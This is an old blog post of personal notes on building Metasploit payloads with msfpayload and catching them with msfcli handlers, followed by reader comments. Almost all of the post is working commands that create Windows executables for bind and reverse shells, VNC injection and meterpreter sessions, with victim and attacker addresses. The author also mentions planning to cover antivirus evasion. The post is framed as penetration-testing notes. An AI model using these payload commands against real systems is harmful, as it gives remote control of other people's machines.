Friday, October 17, 2008

Metasploit Payloads - msfpayload

This entry is really just a place for me to keep notes on working msfpayload details. I will expand on this post as i get more working examples.

These payloads will be detected by AV, I will cover methods of avoiding AV detection in another post.

In my examples 192.168.1.110 is the victim, and 192.168.1.112 is the attacker. Where I have not specified the port it will default to 4444.


1. For a listening shell on the target

Create payload:
./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe

Target:
run Listen-shell.exe

Hacker:
nc 192.168.1.110 2482



2. For a reverse shell on the target

Create payload:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E

Target:
run reverse-shell.exe



3. For a VNC listener on target

Create payload:
./msfpayload windows/vncinject/bind_tcp LPORT=2482 X > Listen-vnc.exe

Target:
run Listen-vnc.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=2482 RHOST=192.168.1.110 DisableCourtesyShell=TRUE E



4. For a reverse VNC session

Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > /tmp/reverse-vnc.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E

Target:
run reverse-vnc.exe



5. For a meterpreter listener

create payload:
./msfpayload windows/meterpreter/bind_tcp LPORT=2482 X > met-listen.exe

Target:
run met-listen.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=2482 E



6. For a reverse meterpreter connection (not working yet. not sure why)

Create payload:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 X > /tmp/met-reverse.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.112 E

Target:
run met-reverse.exe


UPDATE: Payload should for 6 should read:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 LPORT=4444 X > /tmp/met-reverse.exe



This post was inspired by pauldotcom.

12 comments:

CG said...

you need to specify a port for #6

SynJunkie said...

cheers Chris. I'll give that a go.

overclucker said...

well, i bet he wanted port 4444. elsee he would have done differently. Thank you synjunkie! your work shows important msf functionality not covered in the documentation. Perhaps you would consider making contributions to the msf documentation. Often times, I come accross this belief that, if you cannot figure it out for yourself, you don't deserve to figure it out at all. I say: man ain't all there. . . that is the manual doesn't always enlighten thee full functionality of a of a program or tool set. Forgive my Bourbon influenced ramblings . . .

SynJunkie said...

Hy thanks for the comment Overclucker.

I keep meaning to update this MSF post but I didn't think it was useful to anyone but me.

Have you checked out Chris Gates site (Carnal0wnage). He has loads of MSF stuff that makes mine look pityfull.

Keep drunk posting man!!!

Anonymous said...

Hey,
I'm a dude in Sweden, experimenting with BT3 on my EEE. Thx for posting this stuff, it helped me with pentesting a Win2000 laptop. Couldn't find any premade windows binary (.exe) file in BT3 that I could upload with meterpreter to start a VNC-server. Used your way and it worked like a charm. Nice blog too =)

SynJunkie said...

No probs, really glad you found this stuff useful.

Cheers

Syn

Reeth said...

Hey very useful, thank you for this!

greetings reeth

myownremote.blogspot.co

SynJunkie said...

Hey thanks, and a nice looking blog you have there.

Cheers

syn

Anonymous said...

6. For a reverse meterpreter connection (not working yet. not sure why)

your command line is missing the LPORT variable

Create payload should be:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 LPORT=4444 X > /tmp/met-reverse.exe

SynJunkie said...

I got that from Chris's comment but cheers. i'll update the post.

Lee

Anonymous said...

Hi m8

These are more than useful notes on MSF

Thanks for the sharing, they made me understand important issues regarding the function of MSF

Keep it spinning

ratb0y

emaniacs said...

thanks, i need your post..